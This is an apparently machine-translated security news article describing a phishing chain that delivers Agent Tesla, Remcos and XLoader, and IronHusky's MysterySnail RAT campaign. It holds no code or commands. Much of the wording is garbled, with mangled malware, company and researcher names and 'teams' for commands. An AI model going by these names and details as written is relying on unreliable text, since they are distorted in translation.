A new multi -stage attack has been noted, which provides malware such as Tesla options, Remcos Rat and Xloader.
“The attackers are increasingly counting on such complex delivery mechanisms to avoid detection, bypassing traditional sandboxes and ensuring successful delivery and execution of useful load,” “Palo Alto Networks Unit 42 Researcher Sakib Hanzada” – Note In the company’s technical record.
The starting point of the attack is a deceptive letter that presents the request for the malicious attachment of the 7-ZIP archive, which contains the JavaScript file coded (.jse).
The e -mail, which was observed in December 2024, falsely claimed that the payment was made and urged the recipient to revise the invested order file. Running the useful load of JavaScript launches the infection sequence, and the file acts as a download for the PowerShell script from the external server.
The scenario, in turn, places a useful load that encodes the Base64, which is further deciphered, written in the temporary catalog and is performed. That’s where something interesting happens: the attack leads to the dropper of the next stage, which is either composed of .Net or Autoit.
In case of .Net. A snake key or Xoloader – deciphered and entered into the running process “regasm.exe”, the technique observed in Past companies agent Tesla.
On the other hand, Autoit is a executable file, introducing an additional layer in an attempt to further complicate the analysis efforts. The Autoit script in the executable file includes an encrypted useful load responsible for downloading the final Shellcode, causing the .Net file to be introduced into the “Regsvcs.exe” process, which eventually leads to Tesla’s deployment.
“This suggests that the attacker uses several ways to enhance the stability and detection of evasion,” Hanzad said. “The attacker’s focus remains a multi -layered attack chain, not a complex plug.”
“By investing simple stages, not focusing on very complex methods, attackers can create elastic attack chains that complicate the analysis and detection.”
Ironhusky provides a new version of Mysterysnail rats
The disclosure of information occurs as Caspersorski minute A company that focuses on state organizations located in Mongolia and Russia, with a new version of malware called Mystery Rat. The activity was related to the Chinese -speaking threatening actor called Ironhusky.
Ironhusky, assessed active at least 2017, was Previously documented A Russian cybersecurity company in October 2021 in connection with zero operation of the CVE-2021-40449, a lack of Win32K escalation to deliver Mysterysnail.
The infections come from the malicious Microsoft Management (MMC) script, which mimics the Word document from the National Mongolian Land Agency (“The Literary Employee”). The scenario is designed to obtain the ZIP archive with the bait document, legal binary (“ciscoclabhost.exe”) and malicious dll (“ciscosparklauncher.dll”.
It is not quite known how the MMC scenario extends to the goals that are of interest, although the nature of the bait document suggests that it can be through a phishing campaign.
As is observed in many attacks“Ciscocolabhost.exe” is used to select dll, intermediary rear pipeline Project.
Backdoor supports opportunities to run command shells, download/download files, directory content, file deletion, new processes and stop yourself. These teams are then used for a rats to download Mysterysnail.
The latest malicious software version is capable of taking almost 40 teams, allowing it to perform file management operations, execute commands through cmd.exe, spawns and kill processes, manage services and connect to network resources using DLL.
Caspersci said they noticed that the attackers were throwing a “converted and lighter version” of Mystery Codenape Mysterymonosnail after the affected companies had initiated preventive actions for blocking the invasion.
“This version does not have as many opportunities as the Mystery Rat version,” the company said. “It was programmed to have only 13 major teams used to list the contents of the directory contents, write data into files, and launch processes and remote shells.”
